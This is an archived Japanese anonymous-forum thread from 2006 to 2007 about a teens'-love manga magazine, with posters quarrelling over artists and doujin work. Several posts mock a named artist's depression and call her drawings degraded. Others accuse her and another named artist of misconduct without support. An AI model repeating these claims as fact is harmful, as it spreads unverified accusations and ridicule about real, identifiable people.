興味のある人は作家スレでロムればいい話だから。

【同人話は是か非か。その理由も】
非。
個人的に同人の事情に興味がないから。
同人の話になるとたいていBLの話に移り
必ずTLが業界最低だという流れになるから。
TLの話がしたいから。


↑頭悪い文章w

318 :花と名無しさん:2006/11/30(木) 23:42:57 ID:???0
どうしてこっちに持ってくる訳?
別に頭悪いとも思わないけど

319 :花と名無しさん:2006/12/01(金) 10:27:24 ID:???0
向こうで文句言えないからだろ('A`)

320 :花と名無しさん:2006/12/01(金) 12:03:46 ID:???0
アホだな・・・

321 :花と名無しさん:2006/12/01(金) 18:44:10 ID:???0
自分はもう向こうに書いたが

祭にはあれだけワラワラ参加するくせに、本当に意見が必要な時にはダンマリ
結局叩きがやりたいだけのヤシばっかなのか
同じ避難所の別スレでIP出しててレスがしづらい作家だらけか…

もうTLスレなんて避難所だけでいい気がす

322 :花と名無しさん :2006/12/01(金) 19:07:40 ID:???0
結局作家叩いてたのも作家ということか?
標的になった作家もかわいそうに・・・

323 :花と名無しさん:2006/12/01(金) 19:40:56 ID:???0
あっちは管理人が居るって事に、気付いてなかった
身バレが怖い作家ばっかりって事やね

324 :花と名無しさん:2006/12/01(金) 22:28:41 ID:???0
なんかもうこのままでいい気もしてきた
しかし…自分の普段いるスレは少女漫画板だし人も多いが叩きなんてないよ
やっぱり作家が元凶という気がする

325 :花と名無しさん:2006/12/01(金) 22:39:20 ID:???0
少女漫画板はねっとりとした
女の私怨に満ちあふれてるよ
>324は普段いいスレにいるんだね

このまま避難所でいいには胴衣

326 :花と名無しさん:2006/12/01(金) 23:13:01 ID:???0
次スレの話は避難所でやろうって決めたんだから
ここで話すこと自体どんな正論であれスレ違いだお
避難所でいいと思うなら向こうにレスしなされ


このスレも他人事じゃないな
次どうするんだ?

327 :花と名無しさん:2006/12/02(土) 01:01:01 ID:???0
>>326
スマソ

こっちはどうなるんだろうね、別にスレなくてもいいかな
とも思う。
荒らし云々より、最近は雑誌もつまらなくなって買ってないときもあるし

328 :花と名無しさん:2006/12/02(土) 01:46:24 ID:???O
作家が荒らしてると主張する人たちはレス時間が近いの法則
午後8時から9時いっぱいまで何してたんだろ
会社から家までの空白の時間かな

329 :花と名無しさん :2006/12/02(土) 01:55:34 ID:???0
で なにが言いたいの?

330 :花と名無しさん:2006/12/02(土) 02:59:13 ID:???0
>>328
次スレ関連の話題への疑惑反論もスレ違いなので
思うところがあるなら
>>321->>323までをコピペして避難所でレスして下さい


漫喫ならIPも変わるぞw

331 :花と名無しさん:2006/12/02(土) 21:25:11 ID:???0
こっちもID移動まではいいのかもしれないけど
管理人がいるところに避難って言うのは、何となく気持ちよくない

332 :花と名無しさん:2006/12/02(土) 23:07:32 ID:???0
ここの次スレのこと?だったらpink板がいい
作家は来るだろうけど連投は今までよりは困難だから
上の同人絵論争みたいなことにはならないとオモ

333 :花と名無しさん:2006/12/10(日) 17:38:01 ID:???0
保守

334 :花と名無しさん:2006/12/11(月) 08:18:38 ID:???0
特集のホストクラブがレイープ事件やっちゃたね

335 :花と名無しさん:2006/12/11(月) 14:26:49 ID:???O
ちょっと質問なんだが、
この雑誌買ってる大概の女は、
この雑誌をオカズにしてるの?

336 :花と名無しさん:2006/12/11(月) 14:31:02 ID:???0
さあ。
この雑誌を買ってる女はあまりこのスレにいないから。

ヒント「作家は献本で無料配布されるので金を払わなくてもよい」

337 :花と名無しさん:2006/12/11(月) 14:51:00 ID:???0
>>336
君も作家?

338 :花と名無しさん:2006/12/21(木) 14:16:46 ID:???0
やっぱり作家しかいないスレなんだw

339 :花と名無しさん:2006/12/21(木) 22:34:52 ID:???0
この時期作家はコミケで忙しいだろうからね

340 :花と名無しさん:2006/12/22(金) 12:38:04 ID:???0
まだ300番台だけど埋めちゃう?
どうしても恋パラの話したい人は避難所かエロ板の方に立てるってことで

341 :花と名無しさん:2006/12/22(金) 13:04:18 ID:???0
はぁ?
何勝手に仕切ってんの?

342 :花と名無しさん:2006/12/22(金) 14:44:00 ID:???0
梅に賛成
こんな雰囲気悪い場で続けたいヤシの気がしれん

343 :花と名無しさん:2006/12/22(金) 14:56:25 ID:???0
仕切り厨ウザ
pinkでも避難所でも
移動したいやつは勝手に移動すればいいが
スレを私物化するな

344 :花と名無しさん:2006/12/22(金) 15:23:34 ID:???0
>>340
レス番300台で「強制埋め」をやると
一般的には「荒し」と認定されますが、何か?

345 :花と名無しさん:2006/12/22(金) 15:28:40 ID:???0
今月号の作家の叩きマダー?

346 :花と名無しさん:2006/12/22(金) 16:07:59 ID:???0
自分も昨日埋め様かと思ったけど、どうせこのまま放っておいても
下がって落ちると思ったのでやめたよ
梅なんて同じ事考える人いたんだねw

347 :花と名無しさん:2006/12/22(金) 16:32:31 ID:???0
>>346
ほっとこうが、盛り上がろうが
sage進行のスレなので下がったままだけどね。

348 :花と名無しさん:2006/12/22(金) 16:45:05 ID:???0
>>341>>343
言いたいことは分かるけど、そう言う言い方はイクナイよ
もうちょっと会話にする努力をしような


349 :花と名無しさん:2006/12/22(金) 16:51:15 ID:???0
>>347
もちろんageが来たら、速攻埋めてやろうと思っていたよ

350 :花と名無しさん:2006/12/22(金) 17:55:19 ID:???0
だまされるな
梅だのなんだのは、作家のツンデレ羅列アピールだ
そうじゃなきゃ今までなかったのに、19日過ぎで書き込みがあるのはおかしいよw
このままスルーでDAT落ちさせよう

351 :花と名無しさん:2006/12/22(金) 18:02:31 ID:???0
作家だよー。
献本届いたがまだ読んでないよー。
なんか読むのも面倒だよー。

352 :花と名無しさん:2006/12/22(金) 18:24:45 ID:???0
この流れで作家降臨かw
やっぱり作家ってバカばっかwww

353 :花と名無しさん:2006/12/22(金) 18:33:33 ID:???0
つーか
352もぶっちゃけ作家だと思う。

354 :花と名無しさん:2006/12/22(金) 18:41:29 ID:???0
うめ

355 :花と名無しさん:2006/12/22(金) 18:49:20 ID:4oBuz2wF0
埋めるんなら上げるよ。

356 :花と名無しさん:2006/12/22(金) 18:54:20 ID:???0
お疲れ

357 :花と名無しさん:2006/12/22(金) 19:17:00 ID:???0
作家ばっかり?

358 :花と名無しさん:2006/12/22(金) 23:33:58 ID:???0
うめ

359 :花と名無しさん:2006/12/23(土) 01:27:38 ID:???0
立ち読みはしたけど、これといって何もなく
羅列も出来なくてすまん

これも作家の書き込みって
言われるんだろうけどね

360 :花と名無しさん:2006/12/23(土) 02:08:16 ID:???0
作家、乙!

361 :花と名無しさん:2006/12/23(土) 03:12:07 ID:???0
作家です
冬コミ飛翔系フォモ描いてるから来てね☆

362 :花と名無しさん:2006/12/23(土) 03:46:16 ID:tPTuATIH0
2ちゃんねる漫画大賞2006
http://comic6.2ch.net/test/read.cgi/csaloon/1166744048/l50

投票よろしく


363 :花と名無しさん:2006/12/23(土) 04:40:38 ID:???O
すげー荒れてんな、ここ
つーか、2ちゃんねる内の嵐全員がここやTLスレに
集結してるみてーなノリ
他の少女漫画スレは穏やかな所が
ほとんどなのにな
もっと楽しく語り合えないのか?

364 :花と名無しさん:2006/12/23(土) 05:41:51 ID:???0
>>361
スペースナンバー教えて〜

365 :花と名無しさん:2006/12/23(土) 11:54:32 ID:???0
>>363
殺伐としたスレにいったことがないんだね。
2ちゃんの荒し全員終結したらスレ消費に1時間もかからんよ。
こんなまったりした過疎スレで平和ボケしたこと言ってちゃダメダメ。

殺伐とした板、殺伐としたスレなら
「嵐じゃないまっとうなスレ住民の発言」もすっごく殺伐としてる。

366 :花と名無しさん:2006/12/24(日) 13:36:36 ID:???0
>>351
読んでるんだ、偉いね
全然読んでないよ、つまんないしw

367 :花と名無しさん:2006/12/24(日) 14:42:33 ID:???0
>>366
そのつまんない作品よりもさらにつまんないものしか描けなくて載せてもらえない作家さん?

368 :花と名無しさん:2006/12/24(日) 15:00:02 ID:???0
あ、石崎たんだー!

369 :花と名無しさん:2006/12/24(日) 15:07:11 ID:???0
石崎粘着厨は消え失せろ

370 :花と名無しさん:2006/12/24(日) 15:22:40 ID:???0
死体に鞭打ち…

371 :花と名無しさん:2006/12/24(日) 16:39:11 ID:???0
作家はもういないのに

372 :花と名無しさん:2006/12/25(月) 21:59:37 ID:???0


373 :花と名無しさん:2006/12/25(月) 22:52:55 ID:???0
では、わたくしも梅

374 :花と名無しさん:2006/12/27(水) 12:49:33 ID:???0
恋パラの原稿の締切っていつ?

375 :花と名無しさん:2006/12/27(水) 15:23:37 ID:???0
月末だったような気がする。
発売月に入ると担当さんがちょっとぴりぴりしてくる。

376 :花と名無しさん:2006/12/27(水) 15:58:08 ID:???0
>>375
え?私とは違うね
作家によって違うってのは聞いたことあるけど

377 :花と名無しさん:2006/12/27(水) 16:48:10 ID:???0
>>375
私は上旬で聞いてるなあ。
サバ読んで早めの月頭なのか
遅めで翌月の月頭なのか
どっちかわからんけど。

378 :花と名無しさん:2006/12/27(水) 17:15:46 ID:???0
ちょwww
発売月でも間に合うのかよ!!

真面目にやってもそれが報われるわけじゃないんだなー
人気があるかないか、それだけの世界

379 :花と名無しさん:2006/12/27(水) 17:31:10 ID:???0
あたりまえじゃん

380 :花と名無しさん:2006/12/27(水) 18:55:11 ID:???0
発売月の10日くらいまではギリギリ桶って聞いた

381 :花と名無しさん:2006/12/27(水) 20:52:39 ID:???0
>379
時々汚い言葉でレスしてるヤシだよね
どういう躾されてるんだろ
ま、親もそれなりなんだろうけどプ

382 :花と名無しさん:2006/12/27(水) 21:02:42 ID:???0
エスパー発見!

383 :花と名無しさん:2006/12/27(水) 21:30:08 ID:???0
この板で意地でも恋パラスレ継続させたい作家って何が目的なんだ
自分の話題して欲しいのか自分より人気の作家叩きたいのか

384 :花と名無しさん:2006/12/27(水) 21:48:08 ID:???0
うめ

385 :花と名無しさん:2006/12/27(水) 23:15:53 ID:???0
今の時代、同人やってるのが当たり前なのに毛嫌いしてる方が異常だと思う

386 :花と名無しさん:2006/12/28(木) 00:44:33 ID:???0
同人絵が嫌いって人の発言が
ただの僻みとか恨みっぽくにしか聞こえないのは気のせいか?

なんか、そんなに嫌いなら
漫画読まなきゃいいじゃん。って思う。

387 :花と名無しさん:2006/12/28(木) 12:48:58 ID:???0
いきなりどうして同人話?
プロ作家で同人やるのが当たり前って…ポカーン
じゃあのだめやNANAの作者は同人やってるんだ?

あほらしい作家のたわごとなんて、自己弁護にしか聞こえない

そんなわけで梅

388 :花と名無しさん:2006/12/28(木) 12:50:34 ID:???0
同人あがりの作家を嫌う発言って

1)同人あがりの今風(?)の絵に対するオバ作家の牽制
2)同人あがりの今風(?)の絵に対するオバ作家の嫉妬
3)同人やってるが芽の出ない(売れない)オタのひがみ

どれじゃろうか。

389 :花と名無しさん:2006/12/28(木) 13:04:13 ID:???0
クランプも田村由美も高河ゆんも同人出身だし竹内直子も同人やってるみたいだし、
今更同人どうこういえない流れなんじゃないのか?

390 :花と名無しさん:2006/12/28(木) 13:09:27 ID:???0
同人は否定しないけど、パロとか他人の褌で勝負してる事なのに
堂々としてるのはどうかな?って思う
TL作家も一応プロ作家なんだろうし、プライドってないのかな
とは思う。

同人絵は良く判らん、下手で古くなければ良し。

391 :花と名無しさん:2006/12/28(木) 13:16:13 ID:???0
>>388
それってなんて石崎タン?

392 :385:2006/12/28(木) 14:45:30 ID:???0
すいません釣りでした

皆さん頑張ってペーパー作って下さいwww

393 :花と名無しさん:2006/12/28(木) 18:14:18 ID:???0
>>390
全員とは言わないが若いころから同人にはまってそれ中心の世界で育ってきた人だと
自分のやってることが所詮お遊びであるパロだって自覚ないよ
そういう人種にとっては自分のカップリング解釈は原作とは別のオリジナルって考えだから
だから30歳超えた大人が平気でカプ論争したり
商業誌でパロのパロなんて恥知らずなことしたりする

394 :花と名無しさん:2006/12/30(土) 16:36:27 ID:???0
--------------------------------------------------------------------------------
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
デザート投稿者スレッド2 [アニメ漫画業界]
*漫画家&アシ&編集&投稿者 質問交流スレ17* [アニメ漫画業界]

395 :花と名無しさん:2007/01/02(火) 11:30:41 ID:???O
あけうめ

作家はコミケ→帰省中?

396 :花と名無しさん:2007/01/02(火) 17:41:59 ID:???0
今話題の狂犬テンテ−が描く事になったTL誌って
やっぱり恋パラ?
絵も本人も相当キモいんだけど

397 :花と名無しさん:2007/01/04(木) 23:03:37 ID:???0
ttp://tojo-asami.com/news.shtml
狂犬ニキーすごいw

398 :花と名無しさん:2007/01/05(金) 22:45:31 ID:???0
恥子タンが小物に見えるな
上には上がいるものだ…

399 :花と名無しさん:2007/01/06(土) 00:35:26 ID:???0
東城麻美って普通に絵は綺麗だった記憶がある
まあ人となりはどうでもいいや

400 :花と名無しさん:2007/01/06(土) 00:59:55 ID:???0
いや、絵酷いよ
すごい劣化…

401 :花と名無しさん:2007/01/06(土) 01:03:00 ID:???0
うん、劣化はひどい…けどTLじゃまだ通用はする感じ


402 :花と名無しさん:2007/01/06(土) 01:08:01 ID:???0
どんなに絵が劣化しても、今の話題性でレンパラに描くと思う
竹書房ならきっとやる

403 :花と名無しさん:2007/01/06(土) 01:26:21 ID:???0
載るかもしれないが
最近の物と思われる絵ってTLでも下層レベルじゃないかw
それって通用するとはいわんだろう
ttp://page9.auctions.yahoo.co.jp/jp/auction/k41319273
ttp://page7.auctions.yahoo.co.jp/jp/auction/g48222030
ttp://page5.auctions.yahoo.co.jp/jp/auction/e64260621

まあネタとしておもしろそうなので
どうぞ描いてくれよテンテ−www

404 :花と名無しさん:2007/01/06(土) 12:15:12 ID:???O
昔はシャープで綺麗な絵だったのにな
エロもしっかり描いてて面白かったのに劣化したなぁ

405 :花と名無しさん:2007/01/06(土) 13:53:11 ID:???0
>>403
これって全部東城本人が出品してるって・・・アボガドバナナかと

406 :花と名無しさん:2007/01/06(土) 14:49:54 ID:???0
テンテー本人は生きようが氏のうがどうでもいいが
仕事とはいえそれの相手をしなきゃいけない編集やアシや精神科医は大変だな
そっちの人達の方が頭おかしくなりそうw

407 :花と名無しさん:2007/01/06(土) 15:26:07 ID:???0
ヲチスレより

2007/01/05 (金) ありがとうございます

担当さんおふたりからお電話をいただきました。

「今はしっかりやすんで、描く意欲が湧いて来たらいつでも描いて下さい」
もったいないようなお言葉です。

ここ2〜3年うつ病のピーク、で仕事して、突然崩壊。
抜けだせるかな。いつか。

でもうつでも結構良いネームだったみたいで
芳文社の担当さんはネームを見て、
「もう目もよくなってるし構図も冴えてるな」と
思って下さった所へ「辞めます」ですから…;竹書房の担当さんも
ほぼ同じリアクションだったんじゃないかな。

共通しておっしゃって頂いたのは、

「今はやすんでもいいです。描けなくてもいいから、
元気だけは取り戻して下さいね」

本当にありがとうございます。本当にもったいないです。
果報者です。本当に。



ということは残念ながら当分載らないんじゃまいか

408 :花と名無しさん:2007/01/06(土) 16:51:30 ID:???0
どうせ笑われるのなら、オークション出品で人として笑われるより
TL作家になって劣化した絵を描いてでも、作家として笑われればいいのに。
まだエロをバンバン描けばこっちではニーズありそうだしね

409 :花と名無しさん:2007/01/06(土) 17:51:49 ID:???0
つい3日前に作家辞める宣言出したばっかりジャマイカ

410 :花と名無しさん:2007/01/06(土) 20:53:59 ID:???0
最近の恋パラって巻頭、カラーの作家がどんどんアボーンしてるから
東城テンテー呼んだのかも

テンテーネタよりもなぜ作家がいなくなってるかの方が知りたい

411 :花と名無しさん:2007/01/06(土) 21:42:31 ID:???0
>>410
そんなにカラー作家いなくなってるか?
天野、悠木、恥子、夏生、相田あたりはローテーションでいるけどな

412 :花と名無しさん:2007/01/06(土) 22:01:22 ID:???0
作家の入れ替わりが激しいのは昔からジャマイカ

413 :花と名無しさん:2007/01/08(月) 22:42:11 ID:???0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
デザート投稿者スレッド2 [アニメ漫画業界]
遙時 イタタ神子チャソ魚血スレ〜マターリヲチしる!〜36 [ネットwatch]
*漫画家&アシ&編集&投稿者 質問交流スレ17* [アニメ漫画業界]
遙かなる時空の中で 参拾壱 [同人]
◇◇◇竹書房◇◇◇ [雑誌]
---------------------------------------------------------------
の、竹書房スレより

>501 :匿名希望さん :2007/01/02(火) 05:56:22
>ここやばいって噂本当ですか?
>ご存じの方いらっしゃいませんか?

…作家がいなくなるのはこういう噂とも関係アリ?


414 :花と名無しさん:2007/01/09(火) 00:28:01 ID:???0
いやないだろ

415 :花と名無しさん:2007/01/09(火) 23:59:02 ID:???0
本当に東城テンテーが来てくれたら、ネタでも他の作家よりかは面白いから
描いてくれないかなあ

416 :花と名無しさん:2007/01/11(木) 10:45:21 ID:???0
オークションの原画は
元アシが先生からもらったものを出品してる
ってことになってるが
1枚、1〜3マンくらいになってるよね。
もう何枚も出品してるし、これもし先生の騙りじゃなくて
本当に元アシが横流ししてるんなら他のアシ(いるかどうかしらんが)は
苦々しく思ってたりするのかな。
「お前だけうまいことやりやがって!」って。

417 :花と名無しさん:2007/01/11(木) 11:18:24 ID:???0
>>416
あれはガチでアサミだw

418 :花と名無しさん:2007/01/11(木) 11:27:32 ID:???0
>>416
馬鹿すぎる…!
これだからTLジャンルって言うのは…w

419 :花と名無しさん:2007/01/11(木) 11:37:20 ID:???0
ただのエロしか頭にないからね

420 :花と名無しさん:2007/01/11(木) 11:53:54 ID:???0
TLはただのエロジャンルだって知ってる…w?
だからエロしか頭になくて当たり前でそ?今更何言ってるんだかー…

421 :花と名無しさん:2007/01/11(木) 12:36:20 ID:???0
>>416
本人乙!

422 :花と名無しさん:2007/01/11(木) 16:22:12 ID:???0
TL読者もTL作家も脳が沸いてるってことだな。
おっとTL編集者もか。

ところでアサミサイト閉じちゃったね。
日記読めなくて残念。

423 :花と名無しさん:2007/01/11(木) 21:51:58 ID:???0
いつレンパラに載るのかな、それだけが楽しみだ

424 :花と名無しさん:2007/01/23(火) 19:43:58 ID:???0
吉井凛 トレースパクリ クッキー集英社より
http://p.pita.st/?m=hmbvestv
↓左、ロゴにあわせたほうに注目
http://p.pita.st/?1zaxc8e6
606 :花と名無しさん :2007/01/23(火) 18:04:22 ID:???0
>>594
一枚目の奴、ロゴが!!! ロゴがそのまんまや〜〜〜!!!
こりゃ言い訳できんね。

80 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)